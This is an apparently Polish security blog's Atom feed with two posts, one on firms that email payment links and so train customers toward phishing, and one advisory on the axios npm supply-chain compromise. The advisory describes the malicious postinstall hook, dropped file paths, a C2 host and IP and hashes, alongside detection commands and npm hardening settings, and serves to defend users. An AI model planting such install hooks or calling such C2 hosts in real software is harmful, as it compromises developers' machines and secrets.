<?xml version="1.0" encoding="UTF-8" standalone="no"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en-US">
	<title type="text">Niebezpiecznik.pl</title>
	<subtitle type="text">Piszemy o bezpieczeństwie i nie. Szkolimy programistów i administratorów oraz zwykłe Panie Halinki. No i znamy Twój PIN!</subtitle>

	<updated>2026-04-02T11:36:42Z</updated>

	<link href="https://niebezpiecznik.pl" rel="alternate" type="text/html"/>
	<id>https://niebezpiecznik.pl/feed/atom/</id>
	<link href="https://niebezpiecznik.pl/feed/atom/" rel="self" type="application/atom+xml"/>

	<generator uri="https://wordpress.org/" version="6.9.4">WordPress</generator>
	<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Duże firmy przyuczają ludzi do phishingu (po tym jak przed nim ostrzegały)]]></title>
		<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26831</id>
		<updated>2026-04-02T11:36:42Z</updated>
		<published>2026-04-02T11:36:42Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Luxmed"/><category scheme="https://niebezpiecznik.pl" term="PGNiG"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="socjotechnika"/><category scheme="https://niebezpiecznik.pl" term="Vectra"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" /></a>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić. Problem linków w e-mailach To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><![CDATA[<p>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić.<span id="more-26831"></span></p>
<h3>Problem linków w e-mailach</h3>
<p>To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. Banki prowadzą kampanie edukacyjne przeciwko phishingowi. Nawet państwo inwestuje w materiały edukacyjne, które mają wszystkich obywateli nauczyć jednego &#8212; <strong> nie wpisuj hasła w formularzu logowania, jeśli na stronę trafiłeś przez kliknięcie w link z e-maila.</strong>. Edukacja w tym zakresie jest prowadzona od wielu lat, bo to jedno z najstarszych i najczęstszych oszustw internetowych. A jednocześnie najbardziej skutecznych. </p>
<ul>
<li>Bo ludzie nie zawsze potrafią zorientować się, że e-mail nie pochodzi od tego, za kogo podaje się nadawca. </li>
<li>Bo ludzie nie potrafią też zauważyć literówki na pasku adresowym przeglądarki (lub w ogóle na niego nie patrzą) po kliknięciu w linka z e-maila.</li>
</ul>
<p>Wszystkim byłoby łatwiej, gdybyśmy materiałach edukacyjnych mogli napisać coś w stylu </p>
<blockquote><p>&#8220;żadna uczciwa firma nie będzie Cię zachęcać w e-mailu do logowania (lub płatności) przez kliknięcie w link&#8221;</p></blockquote>
<p>Dobre praktyki rynkowe są stosowane przez niektórych &#8212; zwróćcie uwagę jak w tym zakresie wygląda komunikacja od banków. W e-mailach jest najcześciej zwrot typu &#8220;zaloguj się na swoje konto, potem przejdź na zakładkę X aby aktywować Y&#8221;, <strong>ale bez linka</strong>. Klient przecież wie (powinien wiedzieć) jak się zalogować do usługi z której korzysta, a brak linka skłania go do samodzielnego wpisania adresu strony internetowej lub uruchomienia aplikacji. Tak, może ją wpisać z literówką. Tak, może ją wygooglać i trafić na lewą stronę. Ale te ryzyka nie prowadzą do tylu ofiar co phishing i można je szczelniej kontrolować, niż przyzwyczajenie klienta do &#8220;klikam w każdy link i wpisuję dane&#8221;.</p>
<p>Nie wiemy ile firm zachęca w swojej komunikacji do klikania w linki z e-maila prowadzące do logowania lub płatności, ale sami natknęliśmy się w ostatnim czasie na trzy przykłady.</p>
<div class="info">
Zagrożeń czyhających na internautów jest zdecydowanie więcej. O wszystkich opowiadamy w trakcie 3-godzinnego wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;. To nasz najlepszy wykład o cyberbezpieczeństwie dla każdego. Średnia ocena: 9,48/10. A oto terminy najbliższych wykładów: </p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
		<li><a href="https://nbzp.cz/jnsz-kra2604" target="_blank">KRAKÓW, 9 kwietnia -- zapisz się tutaj!</a></li>
		<li><a href="https://nbzp.cz/jnsz-waw2604" target="_blank">WARSZAWA, 16 kwietnia -- zapisz się tutaj!</a></li>      
		<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
</ul>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f449.png" alt="👉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i reakcje uczestników poprzednich edycji</a>. </p>
<p>PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi!
</p></div>
<h3>Lux Med</h3>
<p>Przypadek numer 1: Grupa Lux Med. Osoby, które zarejestrowały się na wizytę lekarską w zakładzie tej firmy otrzymywały takiego oto maila z potwierdzeniem.</p>
<div id="attachment_26833" style="width: 596px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-26833" class="size-large wp-image-26833" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png" alt="" width="586" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png 586w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-244x250.png 244w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png 719w" sizes="(max-width: 586px) 100vw, 586px" /></a><p id="caption-attachment-26833" class="wp-caption-text">E-mail z Luxmed (wbrew pozorom nie scam)</p></div>
<p>Kliknięcie w link w e-mailu przekierowuje na stronę Luxmedu, która z kolei przekierowuje do bramki płatności PayU. Schemat wykorzystywany w wielu oszustwach internetowych &#8220;na dopłatę&#8221;.</p>
<p>Drugi przypadek: Vectra &#8211; dostawca internetu i innych usług telekomunikacyjnych. Klienci tej firmy po wystawieniu rachunku mogą otrzymać taki e-mail:</p>
<div id="attachment_26834" style="width: 572px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png"><img decoding="async" aria-describedby="caption-attachment-26834" class="size-large wp-image-26834" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png" alt="" width="562" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png 562w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-234x250.png 234w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png 688w" sizes="(max-width: 562px) 100vw, 562px" /></a><p id="caption-attachment-26834" class="wp-caption-text">Mail od Vectry</p></div>
<p>Link w mailu kieruje do eBok, a zaraz potem następuję przekierowanie do płatności. </p>
<p>Trzeci przypadek: PGNiG (Grupa Orlen). Ta firma w przeszłości <a href="https://pgnig.pl/aktualnosci/-/news-list/id/uwaga-na-falszywe-wiadomosci-email-podszywajace-sie-pod-pgnig-obrot-detaliczny-sp-z-o-o-/newsGroupId/10184">ostrzegała przed phishingiem</a>, ale jak widać poniżej, trochę &#8220;przyucza&#8221; do niego swoich klientów.</p>
<div id="attachment_26835" style="width: 539px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26835" class="size-large wp-image-26835" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png" alt="" width="529" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png 529w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-220x250.png 220w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png 549w" sizes="auto, (max-width: 529px) 100vw, 529px" /></a><p id="caption-attachment-26835" class="wp-caption-text">Mail od PGNIG</p></div>
<p>Link w mailu ma treść &#8220;Zapłać online&#8221; co sugeruje przejście od razu do płatności, jednak tu również klient najpierw przekierowany jest do eBOK, potem może przeklikać się do opcji płacenia. Dodajmy, że wyłudzenie dostępu do konta w takim eBOK też miałoby swoją wartość. Są tam dane o punktach poboru, poprzednich fakturach itd.</p>
<p>Wszystkie trzy podmioty odpytaliśmy o tę sprawę i zadaliśmy im kluczowe pytanie. Czy bylibyście Państwo skłonni zmienić te praktyki?</p>
<h3>Vectra: &#8220;Tak&#8230; ale&#8230; tego się nie da tak szybko zmienić&#8230;&#8221;</h3>
<p>Vectra po otrzymaniu pytań odpisała nam dwukrotnie. Najpierw zapewniono nas, że problem jest istotny i będzie analizowany. Potem dostaliśmy drugą, właściwą odpowiedź.</p>
<blockquote><p>Dzień dobry Panie Marcinie<br />
bezpieczeństwo cyfrowe naszych klientów jest dla nas niezwykle istotne i traktujemy je z najwyższą powagą. Spółka ustawicznie pracuje nad rozwijaniem różnorodnych, wielopłaszczyznowych elementów bezpieczeństwa, w tym dedykowanych dla Abonentów. Zgadzamy się, że należy podejmować wszelkie możliwe działania, by jak najskuteczniej eliminować zagrożenia, jakie niesie za sobą phishing, w szczególności ten w zakresie nieufania jakimkolwiek linkom zawartym w korespondencji. Jesteśmy świadomi zagrożeń i dlatego edukujemy stale w tych kwestiach zarówno naszych Klientów jak i pracowników oraz kontrahentów.<br />
Korespondencję masową, do której odniósł Pan swoje uwagi, charakteryzuje długi okres wdrażania nowych rozwiązań. Wynika to choćby z konieczności w tym zmiany dotychczasowych przyzwyczajeń w zakresie korzystania z wdrożonych udogodnień przez Abonentów i użytkowników, czy wyjaśniana przyczyn wprowadzanych zmian. Kluczowe w tym procesie jest także dostosowywanie się do percepcji i zgłaszanych potrzeb Klientów, które wynikają z ich różnego poziomu świadomości i umiejętności w korzystania z usług cyfrowych.<br />
<strong>W odniesieniu do podniesionej przez Pana kwestii eliminowania akcji odnośników, systematycznie ograniczamy ich liczbę i dążymy do pełnej ich eliminacji.</strong> Równolegle promujemy nasze systemy eBok, które stanowią bezpieczny i alternatywny, w tym zabezpieczony przez 2FA, kanał komunikacji, także dla korespondencji elektronicznej (e-mail).<br />
<strong>Podkreślamy, że nasze działania w obszarze zmian w komunikacji masowej muszą być wdrażane rozważnie i muszą adresować potrzeby naszych klientów.</strong> Nie możemy nikogo wykluczać z możliwości i korzyści, jakie dają usługi cyfrowe.<br />
Z pozdrowieniami<br />
Biuro prasowe Vectry</p></blockquote>
<p>Czyli &#8211; jak rozumiemy &#8211; niektórzy ludzie bez linka nie ogarną płatności i dlatego te linki są&#8230; systematycznie eliminowane. Bardzo cieszy nas fakt, że Vectra rozumie problem, ale jednocześnie mamy wrażenie, że nie w pełni.</p>
<h3>PGNIG: &#8220;To link do eBOK więc nie ma problemu!&#8221;</h3>
<p>PGNIG też nam odpowiedziało.</p>
<blockquote><p>Szanowny Panie Redaktorze,<br />
w PGNiG Obrót Detaliczny, Grupa ORLEN, dbamy o bezpieczeństwo klientów, w szczególności w obszarze usług cyfrowych. W ramach konsekwentnie realizowanej strategii chronimy dane oraz wspieramy klientów w bezpiecznym korzystaniu z oferowanych rozwiązań, m.in. poprzez informację i edukację (przykładem mogą być publikacje na naszej stronie internetowej: Ostrzeżenie przed fałszywymi mailami | PGNiG OD).<br />
<strong>Po Pana zgłoszeniu dokonaliśmy ponownej analizy naszej korespondencji z klientami. Wynika z niej, że w żadnym z szablonów wiadomości nie ma linków prowadzących do bezpośredniej płatności. Zamieszczone w nich odnośniki kierują do konkretnych procesów serwisu samoobsługowego eBOK i wymagają autoryzacji poprzez zalogowanie.</strong><br />
Mamy jednak świadomość, że dotychczasowy opis działania „zapłać on-line” mógł wprowadzać w błąd, sugerując niektórym użytkownikom, że link przekierowuje bezpośrednio do tzw. bramki płatniczej. W związku z tym dokonaliśmy korekty opisu na „zaloguj i zapłać”, wskazując jednoznacznie, że cały proces uzyskania wcześniejszego dostępu do systemu PGNiG Obrót Detaliczny.<br />
Serdecznie dziękujemy za Pana zgłoszenie, które przyczyniło się do zmiany, którą wdrożyliśmy.<br />
W razie pytań pozostaje do Pana dyspozycji.</p></blockquote>
<p>Zadaliśmy spółce dodatkowe pytania starając się delikatnie wyjaśnić, że zamieszczanie w mailu linka do jakiejkolwiek strony logowania nie jest najlepszym pomysłem. Do momentu pisania tego tekstu nie otrzymaliśmy żadnych dodatkowych odpowiedzi.</p>
<h3>Luxmed: Prowadzimy prace &#8220;na rzecz wprowadzenia bezpieczniejszych metod&#8221;</h3>
<p>W imieniu Luxmedu odpowiedział nam Łukasza Niewola, Dyrektor Departament Komunikacji Korporacyjnej i Zrównoważonego Rozwoju. Tu również odpowiedź jest w stylu &#8220;chcielibyśmy coś zmienić, ale jeszcze nie zmieniamy&#8221;.</p>
<blockquote><p>Grupa LUX MED stale udoskonala jakość usług, wprowadzając funkcjonalności dostosowane do potrzeb pacjentów, starając się zachować przy tym najwyższe standardy bezpieczeństwa. Linki do płatności w komunikacji e-mailowej są stosowane w ściśle określonych przypadkach. Przed wysłaniem e-maila z linkiem pacjent jest informowany, że go otrzyma i mam możliwość skorzystania z tej formy płatności. Jednocześnie podkreślamy, że w wiadomościach e-mail potwierdzających rezerwację wizyty, czy przypominających o wizycie nie wysyłamy linków do płatności.<br />
Obecnie trwają zaawansowane prace, które mają na celu wygasić tę formę płatności na rzecz wprowadzenia bezpieczniejszych metod. W najbliższym czasie nasi pacjenci będą mogli dokonać płatności przez Portal Pacjenta LUX MED lub stronę sklep.luxmed.pl.<br />
W zdecydowanej większości płatności za usługi dokonywane są przez naszych pacjentów w centrach medycznych przed wizytami.</p></blockquote>
<h3>Co robić? Jak żyć?</h3>
<p>Nigdy nie powinieneś płacić czy logować się po kliknięciu w link z e-maila. Najlepiej samodzielnie wejść na właściwy serwis internetowy nadawcy i poszukać akcji/opcji o której informuje Cię w e-mailu. Wtedy masz pewność, że klikasz po właściwym serwisie. Jeśli po kliknięciu w link widzisz formularz logowania lub płatności, to popatrz na adres URL. Zweryfikuj też szczegóły ewentualnej płatności (kwota, odbiorca), bo bramka płatności może być prawdziwa, ale pieniądze niekoniecznie powędrują tam gdzie myślisz lub w kwocie której się spodziewałeś.</p>
<p>A jeśli prowadzisz firmę i oferujesz jakąś usługę zwykłym konsumentom, nie proponuj im płatności e-mailem po kliknięciu w link. </p>
<p>Ryzyk czyhających na internautów jest więcej. Opowiadamy o nich w trakcie wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;, który już w kwietniu odbędzie się w <strong>Krakowie</strong> i <strong>Warszawie</strong>. <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i terminy</a>. PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi! </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Poważny atak programistów. Popularna biblioteka axios była zainfekowana.]]></title>
		<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26976</id>
		<updated>2026-03-31T08:36:24Z</updated>
		<published>2026-03-31T07:51:10Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ataki"/><category scheme="https://niebezpiecznik.pl" term="axios"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę axiosa jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. Co się stało? Właśnie odkryto kolejny poważny atak na łańcuch dostaw. Tym razem oberwała popularna biblioteka [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><![CDATA[<p>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę <span class="code">axiosa</span> jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. <span id="more-26976"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg" alt="" width="252" height="250" class="aligncenter size-medium wp-image-26977" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 252px) 100vw, 252px" /></a></p>
<h3>Co się stało?</h3>
<p>Właśnie odkryto <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">kolejny poważny atak na łańcuch dostaw</a>. Tym razem oberwała popularna biblioteka programistyczna <strong>axios</strong> powszechnie wykorzystywana do generowania żądań HTTP (pobierana ok. <strong>100 milionów razy tygodniowo</strong>!). Tuż po północy atakujący przejęli kontrolę nad kontem <strong>npm</strong> twórcy biblioteki axios i opublikowali dwie złośliwe wersje, omijając pipeline CI/CD oparty o GitHub Actions i OIDC (Trusted Publisher). Skorzystali po prostu z ręcznej publikacji z pomocą wykradzionego developerowi długoterminowego tokenu dostępu (kto wie, może ów developer, czyli <strong>jasonsaayman</strong> jest ofiarą <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">ostatniego ataku na LiteLLM</a>?).</p>
<p>Oto zainfekowane paczki:<br />
<code>1.14.1 (31 marca o 00:21 UTC, tag latest)<br />
0.30.4 (31 marca 01:00 UTCtag legacy) </code></p>
<p>Zachowanie wstrzykniętego złośliwego kodu różni się między systemami:</p>
<ul>
<li><strong>Windows</strong>: Nadpisuje i chowa się pod fałszywym plikiem Windows Terminal (<span class="code">%PROGRAMDATA%\wt.exe</span>), po czym odpala złośliwego PowerShella. (np. <span class="code">%TEMP%\6202033.ps1</span>, <span class="code">%TEMP%\6202033.vbs</span>)</li>
<li><strong>macOS</strong>: Udaje demona systemowego, zrzucając plik do rzadko sprawdzanego katalogu <span class="code">/Library/Caches/com.apple.act.mond</span> (plus pliki pod <span class="code">$TMPDIR/6202033</span>).</li>
<li><strong>Linux</strong>: Instaluje pythonowego backdoora w <span class="code">/tmp/ld.py</span>.</li>
</ul>
<p>Malware łączy się z C2 pod adresem <span class="code">sfrclak[.]com:8000</span> i wysyła dane o Twoim środowisku, nasłuchuje poleceń oraz zaciera za sobą ślady usuwając pliki instalacyjne. Daje też atakującemu możliwość zdalnego wykonania kodu (RCE).</p>
<blockquote><p>IoC:<br />
IP Serwerów C2: 142.11.206[.]73<br />
Domena kampanii C2 i URL: http://sfrclak[.]com:8000/6202033 oraz sfrclak[.]com (do odrzucenia na poziomie /etc/hosts / iptables)<br />
Złośliwe emaile: ifstap@proton.me oraz nrwise@proton.me<br />
SHA-256 Sumy pakietów w przestrzeni npm:<br />
złośliwy axios w. 1.14.1 &#8211; 2553649f232204966871cea80a5d0d6adc700ca<br />
złośliwy axios w. 0.30.4 &#8211; d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71<br />
złośliwy pakiet plain-crypto-js w. 4.2.1 &#8211; 07d889e2dadce6f3910dcbc253317d28ca61c766<br />
Payload ld.py &#8211; fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<br />
pierwszy dropper setup.js &#8211; e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</p></blockquote>
<h3>Szczegóły techniczne ataku</h3>
<p>Atak był dość dyskretny, nie zmodyfikowano ani jednej linii kodu źródłowego axiosa (co mocno utrudniało wykrycie problemu m.in. z pomocą bazujących na kodzie skanerów typu diff). Jedynymi modyfikacjami w pliku <span class="code">package.json</span> było dodanie złośliwej zależności <span class="code">plain-crypto-js: &#8220;^4.2.1&#8221;</span> oraz usunięcie natywnego skryptu <span class="code">&#8220;prepare&#8221;: &#8220;husky&#8221;</span>. </p>
<p>Nowa zależność nigdy nie była importowana, jej celem było osadzenie instrukcji wywoływanej przy pobieraniu pakietu w tle: <span class="code">&#8220;postinstall&#8221;: &#8220;node setup.js&#8221;</span>. Nieźle to zaplanowano, bo pakiet <span class="code"><a href="https://socket.dev/npm/package/plain-crypto-js/files/4.2.1/setup.js" target="_blank">plain-crypto-js</a></span> udostępnił na nowym koncie na platformie ProtonMail inny osobnik, podpisujący się jako <strong>nrwise</strong> (nrwise@proton.me). Pierwsza wersja z pełnym fałszywym i nieaktywnym kodem (4.2.0) została umieszczona w serwisie <strong>30 marca o 05:57 UTC</strong>, a zainfekowana (4.2.1) o 23:59 UTC, czyli tuż przed wstrzyknięciem jej do złośliwego axiosa. Aby uśpić czujność ewentualnych badaczy, <strong>plain-crypto-js</strong> podszywał się pod inną, bezpieczną bibliotekę <span class="code">crypto-js</span> poprzez linkowanie opisu, aż po kopiowanie dziesiątek z oryginalnych plików (m.in. aes.js o rozmiarze 8649 bajtów, blowfish.js, md5.js, sha256.js, itp.). </p>
<p>Jedyne obce i groźne pliki we wstrzykniętym archiwum to zaledwie jedno-linijkowy <span class="code">setup.js</span> (wielkości 4209 bajtów) oraz czysty szablon konfiguracji <span class="code">package.md</span> o rozmiarze 725 bajtów. Tutaj <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" target="_blank">pełna analiza</a> wstrzykniętego trojana. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg" alt="" width="600" height="224" class="aligncenter size-large wp-image-26978" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-350x131.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-768x287.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-1536x574.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg 1658w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Mam Axiosa &#8212; co robić, jak żyć?</h3>
<p>Jeśli zainstalowałeś wersję 1.14.1 lub 0.30.4, musisz założyć najgorsze. Atakujący mogli mieć całkowity dostęp do Twojego systemu. Dlatego natychmiast:</p>
<ul>
<li>Sprawdź czy masz zainfekowane paczki. Stepsecurity sugeruje wykonanie tych poleceń:
<p><code>npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"<br />
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"<br />
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"<br />
# macOS<br />
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"<br />
# Linux<br />
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"<br />
# Windows (cmd.exe)<br />
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED</code></p>
<li>Odłącz maszynę od internetu, zbierz ślady pod forensic, a jeśli nie zamierzasz lub nie potrafisz go przeprowadzać, to odtwórz maszynę z czystego backupu lub przeinstaluj.
<li>Zrotuj klucze SSH, klucze API, tokeny NPM i inne sekrety. Nie zapomnij o plikach .env. Zmień hasła.
</ul>
<p><strong>Na przyszłość:</strong> Jeśli nie musisz, nie pozwalaj paczkom na samowolkę podczas instalacji. Używaj flagi npm ci <span class="code">&#8211;ignore-scripts</span>. Warto też zauważyć, że oba wydania pozbawione były commitów (brak pola gitHead), oficjalnych tagów w repozytorium GitHub (wywołanie GitHub API o tag v1.14.1 zwracało błąd 404) oraz SLSA provenance attestations, które w wersji poprzedniej (1.14.0 i 0.30.3) były obecne. Warto się zastanowić, czy nie wykrywać tego typu anomalii przy zaciąganiu nowych wersji paczek. Albo czy nie <strong>opóźniać instalacji nowych paczek</strong> o kilka dni &#8212; jak widać po ostatnich atakach, community dość szybko wykrywa ataki, więc zamrożenie wersji zależności może być dobrym ogranicznikiem ryzyka.</p>
<p><code>~/.config/uv/uv.toml<br />
  exclude-newer = "7 days"<br />
  ~/.npmrc<br />
  min-release-age=7 # days<br />
  ignore-scripts=true<br />
  ~/Library/Preferences/pnpm/rc<br />
  minimum-release-age=10080 # minutes<br />
  ~/.bunfig.toml<br />
  [install]<br />
  minimumReleaseAge = 604800 # seconds</code></p>
<p>Jeśli potrzebujecie zadbać o <strong>bezpieczeństwo swoich projektów programistycznych</strong> od A do Z, to zapraszamy na nasze turbo-praktyczne szkolenie &#8220;<a href="https://niebezpiecznik.pl/web" target="_blank">Bezpieczeństwo Webaplikacji</a>&#8220;, w ramach którego podczas <strong>praktycznych 2-dniowych warsztatów</strong> pokazujemy jakich błędów przy tworzeniu oprogramowania uniknąć i jak im zapobiegać. Średnia ocen tego szkolenia to <strong>9,45/10</strong>. Oto najbliższe terminy tego szkolenia:</p>
<div class="info"><div><p><b style="color:#f00">Poznań</b>: <strong>20-21 kwietnia 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 02 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gzvg7v">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 3 kwietnia)<br>
                        2744 PLN netto (od 4 kwietnia)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>11-12 maja 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 02 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1hyq9f5">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 3 kwietnia)<br>
                        2744 PLN netto (od 4 kwietnia)
